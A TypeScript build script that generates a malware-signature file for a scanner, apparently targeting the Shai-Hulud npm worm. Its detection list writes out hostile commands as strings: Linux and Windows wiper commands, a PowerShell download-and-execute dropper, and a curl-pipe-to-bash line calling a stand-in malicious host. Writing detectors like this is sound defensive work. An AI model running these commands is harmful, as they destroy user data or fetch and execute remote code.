import * as fs from 'fs';
import * as path from 'path';

/**
 * This script generates the signatures file.
 * Signatures are stored in plain text to ensure transparency.
 */

// THE LIST OF MALICIOUS STRINGS TO DETECT
// These are the "signatures" of Shai-Hulud and other malware.
const SIGNATURES = {
    // Malicious filenames
    filenames: [
        'setup_bun.js',
        'bun_environment.js',
        'shai-hulud.js',
        'worm.js',
    ],
    // Malicious string patterns in scripts
    scriptPatterns: [
        'Shai-Hulud',
        'The Second Coming',
        'shred -uvz -n 1', // Linux wiper
        'del /F /Q /S "%USERPROFILE%*"', // Windows wiper
        'irm bun.sh/install.ps1|iex', // PowerShell dropper
        'curl -sL http://malicious.com | bash', // Generic dropper
        'node setup_bun.js', // Shai Hulud specific
    ],
};

function generateFileContent() {
    return `/**
 * AUTO-GENERATED FILE - DO NOT EDIT
 * Generated by scripts/encrypt-signatures.ts
 *
 * This file contains signatures for detecting malware.
 * They are stored in plain text for transparency.
 */

export const MALWARE_FILENAMES = ${JSON.stringify(SIGNATURES.filenames)};
export const MALWARE_PATTERNS = ${JSON.stringify(SIGNATURES.scriptPatterns)};
`;
}

const outputPath = path.join(__dirname, '..', 'src', 'generated', 'signatures.ts');
const outputDir = path.dirname(outputPath);

if (!fs.existsSync(outputDir)) {
    fs.mkdirSync(outputDir, { recursive: true });
}

fs.writeFileSync(outputPath, generateFileContent());
console.log(`✅ Generated signatures at ${outputPath}`);
